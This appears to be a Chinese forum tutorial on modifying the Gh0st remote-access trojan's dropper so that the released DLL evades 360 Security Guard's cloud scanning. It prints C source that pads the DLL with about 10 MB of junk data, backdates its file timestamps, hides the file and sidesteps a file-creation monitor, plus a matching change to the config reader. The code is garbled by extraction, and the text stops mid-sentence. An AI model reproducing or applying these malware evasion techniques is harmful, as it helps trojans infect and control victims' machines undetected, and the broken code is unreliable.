附加垃圾数据.doc

给Gh0st释放的dll添加垃圾附加数据过360安全卫士云查杀-360安全卫士, dll, 垃圾, 数据, 释放给Gh0st释放的dll添加垃圾附加数据过360安全卫士云查杀 在一个论坛看到一种过云查杀的思路，也就是靠增大自身文件大小从而让云查杀软件无法上传分析你的服务端，下面是这个方法在Gh0st这个远控上面的应用：一：install工程BOOL ReleaseResource(HMODULE hModule, WORD wResourceID, LPCTSTR lpType, LPCTSTR lpFileName, LPCTSTR lpConfigString) HGLOBAL hRes; HRSRC hResInfo; HANDLE hFile; DWORD dwBytes; char strTmpPathMAX_PATH; char strBinPathMAX_PATH; / 一定要跟别的区分开，GetTickCount有可能得到一样的值 GetTempPath(sizeof(strTmpPath), strTmpPath); wsprintf(strBinPath, %s%d_res.tmp, strTmpPath, GetTickCount(); hResInfo = FindResource(hModule, MAKEINTRESOURCE(wResourceID), lpType); if (hResInfo = NULL) return FALSE; hRes = LoadResource(hModule, hResInfo); if (hRes = NULL) return FALSE; hFile = CreateFile ( strBinPath, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL ); if (hFile = NULL) return FALSE; SYSTEMTIME st; memset(&st, 0, sizeof(st); st.wYear = 2004; st.wMonth = 8; st.wDay = 17; st.wHour = 20; st.wMinute = 0; FILETIME ft,LocalFileTime; SystemTimeToFileTime(&st, &ft); LocalFileTimeToFileTime(&ft,&LocalFileTime); SetFileTime(hFile, &LocalFileTime, (LPFILETIME) NULL, &LocalFileTime); WriteFile(hFile, hRes, SizeofResource(NULL, hResInfo), &dwBytes, NULL); / 写入配置 if (lpConfigString != NULL) WriteFile(hFile, lpConfigString, lstrlen(lpConfigString) + 1, &dwBytes, NULL); /给dll末尾添加垃圾附加数据以增大文件体积 int i = 0; char *szStrAdd; szStrAdd=new char1024*1024; memset(szStrAdd,.,1024*1024);/这里循环10次，释放的dll大概就是10M了，如果想把dll再弄大点，修改这里就可以了 while(i 10) WriteFile(hFile, szStrAdd, lstrlen(szStrAdd), &dwBytes, NULL); i+; CloseHandle(hFile); FreeResource(hRes); / Fuck KV File Create Monitor MoveFile(strBinPath, lpFileName); SetFileAttributes(lpFileName, FILE_ATTRIBUTE_HIDDEN); DeleteFile(strBinPath); return TRUE;二：svchost工程/#define MAX_CONFIG_LEN 1024 /这句注释掉，改成下面的#define MAX_CONFIG_LEN 90000/* 这个数字大概为dll文件字节数的9/10左右就可以了，如上图，这个刚编译出来的dll文件大小为100,864字节，那么我这里把MAX_CONFIG_LEN改成100,864的9/10，就是90,000就可以了*/LPCTSTR FindConfigString(HMODULE hModule, LPCTSTR lpString) char strFileNameMAX_PATH; char *lpConfigString = NULL; DWORD dwBytesRead = 0; GetModuleFileName(hModule, strFileName, sizeof(strFileName); HANDLE hFile = CreateFile(strFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL); if (hFile = INVALID_HANDLE_VALUE) return NULL; / -MAX_CONFIG_LEN改成MAX_CONFIG_LEN，FILE_END改成FILE_BEGIN SetFilePointer(hFile, MAX_CONFIG_LEN, NULL, FILE_BEGIN); lpConfigString = new charMAX_CONFIG_LEN; ReadFile(hFile, lpConfigString, MAX_CONFIG_LEN, &dwBytesRead, NULL); CloseHandle(hFile); int offset = memfind(lpConfigString, lpString, MAX_CONFIG_LEN, 0); if (offset = -1) delete lpConfigString; return NULL; else return lpConfigString + offset; 对比分析：（360安全卫士版本为V6.2 2009-12-26测试）修改之前：用360云查杀扫描：（会提示用户上传服务端dll文件）/-修改之后：释放的dll大小为10M多，用360云查杀扫描，根本不提示用户上传，但还是会提示“存在风险!”的，这样就不怕36